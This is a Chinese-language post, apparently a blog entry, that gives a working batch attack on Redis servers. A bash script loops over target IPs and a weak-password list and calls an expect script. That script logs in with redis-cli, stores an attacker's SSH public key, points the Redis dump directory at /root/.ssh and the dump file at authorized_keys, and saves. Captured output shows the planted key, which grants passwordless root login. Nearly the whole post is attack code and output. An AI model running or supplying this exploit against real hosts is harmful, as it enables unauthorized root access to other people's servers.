一、shell实现redis反弹shell
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
[root@xingcheng attack]<span class="hljs-comment"># cat shell_rebound.sh</span> <span class="hljs-shebang">#!/bin/bash</span> <span class="hljs-comment">##create by xingcheng</span> <span class="hljs-comment">##20180403</span> <span class="hljs-comment">##function 批量redis反弹shell获取系统权限,主要针对没有安全策略的reids服务器和弱口令redis服务器,他们往往使用root账户运行</span> <span class="hljs-comment">#ip_list=(39.106.107.229 123.206.31.161 127.0.0.1)</span> <span class="hljs-comment">#password_dict=(123456 abcdef 234rdffs)</span> ip_list=(<span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">0.1</span>) <span class="hljs-comment">#ip列表数组,可以批量存入ip</span> password_dict=(<span class="hljs-number">123456</span> abcdefg <span class="hljs-number">1</span>qaz2wsx) <span class="hljs-comment">#弱口令数组</span> <span class="hljs-function"><span class="hljs-title">password</span></span>(){ <span class="hljs-keyword">for</span> passwd <span class="hljs-keyword">in</span> <span class="hljs-variable">${password_dict[@]}</span> <span class="hljs-keyword">do</span> expect shell_rebound.exp <span class="hljs-string">"<span class="hljs-variable">$ip</span>"</span> <span class="hljs-string">"<span class="hljs-variable">$passwd</span>"</span> <span class="hljs-built_in">echo</span> $(cat /root/.ssh/authorized_keys) <span class="hljs-keyword">done</span> } <span class="hljs-function"><span class="hljs-title">ip</span></span>(){ <span class="hljs-keyword">for</span> ip <span class="hljs-keyword">in</span> <span class="hljs-variable">${ip_list[@]}</span> <span class="hljs-keyword">do</span> password <span class="hljs-keyword">done</span> } ip |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
[root<span class="hljs-variable">@xingcheng</span> attack]<span class="hljs-comment"># cat shell_rebound.exp </span> <span class="hljs-comment">#!/usr/bin/expect</span> set sentence1 [lindex <span class="hljs-variable">$argv</span> <span class="hljs-number">0</span>] set sentence2 [lindex <span class="hljs-variable">$argv</span> <span class="hljs-number">1</span>] spawn /usr/<span class="hljs-keyword">local</span>/redis/bin/redis-cli -h <span class="hljs-variable">$sentence1</span> -p <span class="hljs-number">6379</span> -a <span class="hljs-variable">$sentence2</span> expect <span class="hljs-string">"127.0.0.1:6379>"</span> <span class="hljs-keyword">if</span> { <span class="hljs-variable">$sentence1</span>==<span class="hljs-variable">$sentence1</span> } { <span class="hljs-keyword">send</span> <span class="hljs-string">"set -.- \"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb+401+epwi/QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-20180320\n\n\n\" \r"</span> <span class="hljs-keyword">send</span> <span class="hljs-string">"config set dir /root/.ssh \r"</span> <span class="hljs-keyword">send</span> <span class="hljs-string">"config set dbfilename authorized_keys \r"</span> <span class="hljs-keyword">send</span> <span class="hljs-string">"save \r"</span> } expect <span class="hljs-keyword">eof</span> |
成功的效果,免密码登陆服务器成功。
|
1 2 3 4 5 6 7 8 9 10 |
[root<span class="hljs-variable">@xingcheng</span> attack]<span class="hljs-comment"># cat /root/.ssh/authorized_keys</span> <span class="hljs-constant">REDIS0008</span> redis-ver4.<span class="hljs-number">0</span>.<span class="hljs-number">6</span> redis-bits����e.used-mem¸þ ��preamble~��-<span class="hljs-constant">A</span> ssh-rsa <span class="hljs-constant">AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb</span>+<span class="hljs-number">401</span>+epwi/<span class="hljs-constant">QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp</span>+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-<span class="hljs-number">20180320</span> |
